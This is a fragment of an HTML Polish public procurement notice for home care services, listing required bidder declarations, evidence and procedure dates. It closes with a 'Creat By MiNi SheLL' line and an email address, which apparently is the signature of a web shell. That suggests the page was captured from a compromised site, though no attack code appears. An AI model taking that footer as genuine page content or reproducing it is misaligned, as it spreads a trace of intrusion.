przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zgodnie ze wzorem stanowiącym załącznik nr 7 do SWZ. <br/>2) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 1, pkt 2 i pkt 3 ustawy;<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie tytułem środka zapobiegawczego;<br/>c) art. 108 ust. 1 pkt 6 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenia konkurencji - wzór oświadczenia o aktualności informacji sanowi załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe (aktualne na dzień złożenia) składane na wezwanie Zamawiającego (zgodnie z art. 274 ust. 1 ustawy Pzp ) przez wykonawcę, którego oferta została najwyżej oceniona, w wyznaczonym terminie, nie krótszym niż 5 dni.<br/>1. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda złożenia:<br/>1) wykazu wykonanych usług opiekuńczych należycie w sposób ciągły przez okres 12 miesięcy w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – co najmniej 1 usługi (na podstawie jednej umowy) na realizację usług opiekuńczych przez okres minimum 12 miesięcy, przy średniej ilości godzin w miesiącu 900.<br/>Wykonawca poda podmiot na rzecz którego były lub są świadczone usługi, okres realizacji usług, oraz średnią ilość godzin zrealizowanych w miesiącu - zgodnie z wzorem stanowiącym załącznik nr 5 do SWZ oraz załączy dowody potwierdzające, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje/zaświadczenia sporządzone przez podmiot, na rzecz którego usługi zostały wykonane oraz oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych, referencje/zaświadczenia powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. <br/>2) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego z podaniem informacji o podstawie do dysponowania tymi osobami oraz podaniem doświadczenia w wykonywanych usługach opiekuńczych – zgodnie ze wzorem stanowiącym załącznik nr 6 do SWZ wraz z dołączeniem pisemnych oświadczeń wymienionych osób o pozostawaniu w dyspozycyjności na czas trwania umowy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Dokumenty składane przez Wykonawcę:<br/>1) Formularz ofertowy – sporządzony wg załącznika na 2 do SWZ. Formularz musi być złożony w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Brak jego złożenia bądź niewłaściwa forma będą skutkować odrzuceniem oferty. Formularz oferty nie podlega uzupełnieniu. <br/>2. Do oferty Wykonawca dołącza: <br/>1) Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu w zakresie wskazanym w rozdziale VII SWZ. Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. Wzór oświadczenia określa załącznik Nr 3 do SWZ<br/>Oświadczenie składają odrębnie:<br/>- w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>2) Oświadczenie wykonawcy dotyczące spełnienia warunków udziału w postępowaniu w zakresie wskazanym w rozdziale VI SWZ. Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. Wzór oświadczenia określa załącznik Nr 4 do SWZ<br/>3) Pełnomocnictwo - gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia, z którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia; powinno zawierać: nazwę postępowania o zamówienie publiczne, którego dotyczy, wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, ustanowionego pełnomocnika oraz zakres jego umocowania.<br/>Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza.<br/>4) Zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy) – w sytuacji, gdy oferta lub inne dokumenty składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, wykonawca, wraz z przekazaniem takich informacji, zastrzega, że nie mogą być one udostępniane, oraz wykazuje, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2020r poz. 1913 z późn. zm.). Dokument musi być złożony w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:<br/>1)	wspólnie muszą wykazać, że wspólnie spełniają warunki udziału w postępowaniu,<br/>2)	w stosunku do żadnego z nich nie zachodzi jakakolwiek podstawa do wykluczenia na zasadach określonych w Rozdziale VII. Oświadczenie o niepodleganiu wykluczeniu z postępowania składa każdy z Wykonawców, <br/>3)	w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w art. 125 ust . 1 ustawy Pzp, składa każdy z Wykonawców. <br/>4)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,<br/>5)	muszą ustanowić pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Pełnomocnictwo musi mieć formę pisemną lub kopię potwierdzona przez notariusza,<br/>6)	przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę tych wykonawców,<br/>7)	przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zawarto w załączniku nr 9 do SWZ - wzór umowy z załącznikiem do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-04 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć w terminie do dnia 04.03.2022 r do godz. 09:00 za pośrednictwem Platformy miniPortal.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-04 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com